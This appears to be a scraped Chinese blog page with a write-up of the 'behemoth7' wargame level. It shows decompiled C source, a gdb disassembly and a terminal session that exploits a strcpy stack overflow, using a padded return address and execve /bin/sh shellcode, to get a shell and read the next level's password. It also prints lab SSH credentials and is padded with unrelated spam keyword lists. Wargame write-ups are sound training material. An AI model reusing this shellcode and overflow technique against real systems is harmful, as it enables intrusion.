程序博客网 > 注销淘宝店铺重新开通

behemoth - 07

来源:互联网 发布:注销淘宝店铺重新开通 编辑:程序博客网 时间:2024/05/17 18:02
#include <stdio.h>#include <ctype.h>#include <string.h>#include <stdlib.h>extern char **environ;int main(int argc, char *argv[]){char *argv1 = argv[1];/* 0x21c */int envcnt;/* 0x218 */int slen;/* 0x214 */char buf[512];/* 0x014 */envcnt = 0;for(envcnt = 0; environ[envcnt] != NULL; envcnt++)memset(environ[envcnt], '\0', strlen(environ[envcnt]));if (argc <= 1)return 0;for (slen = 0; slen <= 511; slen++) {if (isalpha(argv1[slen]) || isdigit(argv1[slen]))continue;fprintf(stderr, "Non-%s chars found in string, possible shellcode!\n", "alpha");exit(1);}strcpy(buf, argv[1]);return 0;}



栈环境



root@today:~# ssh behemoth7@178.79.134.250behemoth7@178.79.134.250's password: baquoxuafobehemoth7@melinda:~$ cd /tmp/shui7behemoth7@melinda:/tmp/shui7$ vi 12345678901234567890123.cbehemoth7@melinda:/tmp/shui7$ cat  onlyyou.c #include <stdio.h>int main(int argc, char *argv[]){    printf("%p %p\n", argv[1], argv[2]);    return 0;}behemoth7@melinda:/tmp/shui7$ gcc 12345678901234567890123.c -o 12345678901234567890123 -m32behemoth7@melinda:/tmp/shui7$ ./12345678901234567890123 `python -c 'print "U"*536 + "\xf5\xd7\xff\xff"'` `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"'`0xffffd598 0xffffd7b5behemoth7@melinda:/tmp/shui7$ /games/behemoth/behemoth7 `python -c 'print "U"*536 + "\xb5\xd7\xff\xff"'` `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"'`$ whoamibehemoth8$ cat /etc/behemoth_pass/behemoth8pheewij7Ae$


   ┌─────────────────────────────────────────────────────────────────────────────────┐   │0x804852d <main>        push   %ebp                                              │   │0x804852e <main+1>      mov    %esp,%ebp                                         │   │0x8048530 <main+3>      and    $0xfffffff0,%esp                                  │   │0x8048533 <main+6>      sub    $0x220,%esp                                       │   │0x8048539 <main+12>     mov    0xc(%ebp),%eax                                    │   │0x804853c <main+15>     mov    0x4(%eax),%eax                                    │   │0x804853f <main+18>     mov    %eax,0x21c(%esp)                                  │   │0x8048546 <main+25>     movl   $0x0,0x218(%esp)                                  │   │0x8048551 <main+36>     jmp    0x80485a1 <main+116>                              │   │0x8048553 <main+38>     mov    0x218(%esp),%eax                                  │   │0x804855a <main+45>     lea    0x0(,%eax,4),%edx                                 │   │0x8048561 <main+52>     mov    0x10(%ebp),%eax                                   │   │0x8048564 <main+55>     add    %edx,%eax                                         │   │0x8048566 <main+57>     mov    (%eax),%eax                                       │   │0x8048568 <main+59>     mov    %eax,(%esp)                                       │   │0x804856b <main+62>     call   0x80483e0 <strlen@plt>                            │   │0x8048570 <main+67>     mov    0x218(%esp),%edx                                  │   │0x8048577 <main+74>     lea    0x0(,%edx,4),%ecx                                 │   │0x804857e <main+81>     mov    0x10(%ebp),%edx                                   │   │0x8048581 <main+84>     add    %ecx,%edx                                         │   │0x8048583 <main+86>     mov    (%edx),%edx                                       │   │0x8048585 <main+88>     mov    %eax,0x8(%esp)                                    │   │0x8048589 <main+92>     movl   $0x0,0x4(%esp)                                    │   │0x8048591 <main+100>    mov    %edx,(%esp)                                       │   │0x8048594 <main+103>    call   0x8048410 <memset@plt>                            │   │0x8048599 <main+108>    addl   $0x1,0x218(%esp)                                  │   │0x80485a1 <main+116>    mov    0x218(%esp),%eax                                  │   │0x80485a8 <main+123>    lea    0x0(,%eax,4),%edx                                 │   │0x80485af <main+130>    mov    0x10(%ebp),%eax                                   │   │0x80485b2 <main+133>    add    %edx,%eax                                         │   │0x80485b4 <main+135>    mov    (%eax),%eax                                       │   │0x80485b6 <main+137>    test   %eax,%eax                                         │   │0x80485b8 <main+139>    jne    0x8048553 <main+38>                               │   └─────────────────────────────────────────────────────────────────────────────────┘   ┌─────────────────────────────────────────────────────────────────────────────────┐   │0x80485ba <main+141>    movl   $0x0,0x214(%esp)                                  │   │0x80485c5 <main+152>    cmpl   $0x1,0x8(%ebp)                                    │   │0x80485c9 <main+156>    jle    0x8048692 <main+357>                              │   │0x80485cf <main+162>    jmp    0x804865b <main+302>                              │   │0x80485d4 <main+167>    addl   $0x1,0x214(%esp)                                  │   │0x80485dc <main+175>    call   0x8048420 <__ctype_b_loc@plt>                     │   │0x80485e1 <main+180>    mov    (%eax),%edx                                       │   │0x80485e3 <main+182>    mov    0x21c(%esp),%eax                                  │   │0x80485ea <main+189>    movzbl (%eax),%eax                                       │   │0x80485ed <main+192>    movsbl %al,%eax                                          │   │0x80485f0 <main+195>    add    %eax,%eax                                         │   │0x80485f2 <main+197>    add    %edx,%eax                                         │   │0x80485f4 <main+199>    movzwl (%eax),%eax                                       │   │0x80485f7 <main+202>    movzwl %ax,%eax                                          │   │0x80485fa <main+205>    and    $0x400,%eax                                       │   │0x80485ff <main+210>    test   %eax,%eax                                         │   │0x8048601 <main+212>    jne    0x8048653 <main+294>                              │   │0x8048603 <main+214>    call   0x8048420 <__ctype_b_loc@plt>                     │   │0x8048608 <main+219>    mov    (%eax),%edx                                       │   │0x804860a <main+221>    mov    0x21c(%esp),%eax                                  │   │0x8048611 <main+228>    movzbl (%eax),%eax                                       │   │0x8048614 <main+231>    movsbl %al,%eax                                          │   │0x8048617 <main+234>    add    %eax,%eax                                         │   │0x8048619 <main+236>    add    %edx,%eax                                         │   │0x804861b <main+238>    movzwl (%eax),%eax                                       │   │0x804861e <main+241>    movzwl %ax,%eax                                          │   │0x8048621 <main+244>    and    $0x800,%eax                                       │   │0x8048626 <main+249>    test   %eax,%eax                                         │   │0x8048628 <main+251>    jne    0x8048653 <main+294>                              │   │0x804862a <main+253>    mov    0x8049974,%eax                                    │   │0x804862f <main+258>    movl   $0x8048730,0x8(%esp)                              │   │0x8048637 <main+266>    movl   $0x8048738,0x4(%esp)                              │   │0x804863f <main+274>    mov    %eax,(%esp)                                       │   └─────────────────────────────────────────────────────────────────────────────────┘   │0x8048642 <main+277>    call   0x8048400 <fprintf@plt>                           │   │0x8048647 <main+282>    movl   $0x1,(%esp)                                       │   │0x804864e <main+289>    call   0x80483d0 <exit@plt>                              │   │0x8048653 <main+294>    addl   $0x1,0x21c(%esp)                                  │   │0x804865b <main+302>    mov    0x21c(%esp),%eax                                  │   │0x8048662 <main+309>    movzbl (%eax),%eax                                       │   │0x8048665 <main+312>    test   %al,%al                                           │   │0x8048667 <main+314>    je     0x804867a <main+333>                              │   │0x8048669 <main+316>    cmpl   $0x1ff,0x214(%esp)                                │   │0x8048674 <main+327>    jle    0x80485d4 <main+167>                              │   │0x804867a <main+333>    mov    0xc(%ebp),%eax                                    │   │0x804867d <main+336>    add    $0x4,%eax                                         │   │0x8048680 <main+339>    mov    (%eax),%eax                                       │   │0x8048682 <main+341>    mov    %eax,0x4(%esp)                                    │   │0x8048686 <main+345>    lea    0x14(%esp),%eax                                   │   │0x804868a <main+349>    mov    %eax,(%esp)                                       │   │0x804868d <main+352>    call   0x80483b0 <strcpy@plt>                            │   │0x8048692 <main+357>    mov    $0x0,%eax                                         │   │0x8048697 <main+362>    leave                                                    │   │0x8048698 <main+363>    ret                                                      │   └─────────────────────────────────────────────────────────────────────────────────┘


0 0
注销淘宝店铺重新开通 注销淘宝店铺重新开通
原创粉丝点击
热门IT博客
vnr翻译软件vnr翻译软件
人工智能安防公司人工智能安防公司
苹果软件开发培训班
mac vmware删除win七
淘宝分销软件
淘宝旺旺号是会员名吗
facebook登录网络异常
淘宝联盟点击数
趣学python编程小测验
c语言break跳出if
四川网络大学考试平台
淘宝上的逆战出售号
国际网络应该受管制
av淘宝备用网址
jpg读取函数 c语言
c专家编程 知乎
绝世秘籍辅助软件
js input 自动点击
公司单页网站源码
node sass作用
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 装殓 殓怎么读 婚殓师 暴殓天物 天命殓师 摄殓车 摄殓喂药囚禁 第五人格摄殓 摄殓肉 摄殓图片 殖民 殖民计划 香港殖民 殖民帝国 殖民美利坚 全球殖民 大殖民帝国 殖民时代 殖民掠夺 英国殖民 星际殖民 香港殖民多少年 中国殖民异界 早期殖民掠夺 帝国之殖民争霸 香港被殖民多少年 殖民什么意思 网游之星际殖民 火星殖民计划2020年 殖民是什么意思 超级殖民异世界 英国殖民香港 地球位面殖民异界 荷兰殖民帝国 殖民美利坚 李神医 三国之殖民海外 诸天大殖民 刺桐2016 东方殖民者 ahlash 香港什么时候被英国殖民 女人生夝殖艺术画

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里